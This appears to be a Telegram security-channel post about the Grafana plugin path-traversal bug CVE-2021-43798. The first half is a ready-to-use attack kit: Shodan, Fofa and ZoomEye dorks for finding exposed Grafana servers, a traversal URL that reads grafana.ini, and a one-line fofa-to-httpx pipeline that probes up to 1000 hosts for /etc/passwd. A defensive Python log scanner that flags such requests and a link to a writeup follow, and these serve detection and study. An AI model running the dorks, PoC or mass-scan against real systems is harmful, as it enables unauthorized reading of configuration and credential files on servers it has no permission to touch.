This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.me/APT_Notes/6

Chat Link:
t.me/APT_Notes_PublicChat
Grafana — Unauthorized Arbitrary Read File

The latest Grafana unpatched 0Day LFI is now being actively exploited; it affects only Grafana 8.0+.

Dorks:
Shodan: title:"Grafana"
Fofa.so: app="Grafana"
ZoomEye: grafana

PoC:
http://example.com/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.ini

The "plugin-id" could be any plugin that exists in the system.

One line command to detect:
echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd" -mc 200 -ms 'root:x:0:0'

#grafana #lfi #bugbounty #pentest
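For defenders, the useful side of the post above is what the traversal looks like in a web server's access log: a request under /public/plugins/<plugin-id>/ whose path, once percent-decoded and normalized, no longer sits inside that plugin's directory. The following script is an added example and is not part of the channel post or of Grafana itself; the log lines are constructed in a combined-log style for the demonstration, and the /public/plugins/ prefix is the one the post's PoC uses.

```python
"""Flag Grafana /public/plugins/<id>/ path-traversal attempts in access logs.

Added defensive example. SAMPLE_LOG is constructed, not real traffic.
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed sample lines (combined-log style). Two are the traversal shape
# from the post (plain and percent-encoded), one is a legitimate plugin asset,
# one is a traversal attempt that the server rejected, one is unrelated.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Dec/2021:10:11:12 +0000] "GET /public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.ini HTTP/1.1" 200 1893
10.0.0.6 - - [07/Dec/2021:10:11:13 +0000] "GET /public/plugins/graph/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 2001
10.0.0.7 - - [07/Dec/2021:10:11:14 +0000] "GET /public/plugins/graph/module.js HTTP/1.1" 200 51234
10.0.0.8 - - [07/Dec/2021:10:11:15 +0000] "GET /public/plugins/graph/..%2f..%2fconf/defaults.ini HTTP/1.1" 404 0
10.0.0.9 - - [07/Dec/2021:10:11:16 +0000] "GET /login HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
PLUGIN_PREFIX = "/public/plugins/"


def decode_path(raw: str) -> str:
    """Strip the query string and percent-decode a bounded number of times,
    so %2e%2e and double-encoded variants are compared in their decoded form."""
    cur = raw.split("?", 1)[0]
    for _ in range(3):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def is_plugin_traversal(raw_path: str) -> bool:
    """True if the request targets /public/plugins/<id>/ and the normalized
    path escapes that plugin's directory."""
    path = decode_path(raw_path)
    if not path.startswith(PLUGIN_PREFIX):
        return False
    plugin_id, _, _ = path[len(PLUGIN_PREFIX):].partition("/")
    if not plugin_id:
        return False
    # normpath resolves '.' and '..' segments (clamped at '/'); a request that
    # stays inside the plugin directory keeps the same prefix after normalizing.
    plugin_root = PLUGIN_PREFIX + plugin_id + "/"
    return not posixpath.normpath(path).startswith(plugin_root)


def scan_log(text: str) -> list[dict]:
    """Return one record per traversal attempt. A 200 response suggests the
    server actually served the file (unpatched); other codes are attempts
    that are still worth alerting on."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_plugin_traversal(m["path"]):
            continue
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "status": int(m["status"]),
            "path": posixpath.normpath(decode_path(m["path"])),
            "likely_success": m["status"] == "200",
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        flag = "SERVED" if hit["likely_success"] else "attempt"
        print(f'{hit["ip"]} {hit["status"]} {flag} {hit["path"]}')
```

The check deliberately compares the normalized path against the plugin's own directory rather than grepping for `../`, so the percent-encoded forms and any plugin id are caught the same way; a 200 on a flagged line is the signal that the host still needs the fix from the CVE-2021-43798 writeup below, and the absolute target path in the record shows which file was read.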
A (not so deep) Dive into Grafana CVE-2021-43798

This post will cover some details behind the recent Grafana vulnerability (CVE-2021-43798), which is a directory traversal bug allowing unauthenticated attackers to read files on the target server filesystem. This post will also discuss some real-world scenarios and the attack surface of Grafana.

https://nusgreyhats.org/posts/writeups/a-not-so-deep-dive-in-to-grafana-cve-2021-43798/

#grafana #lfi #cve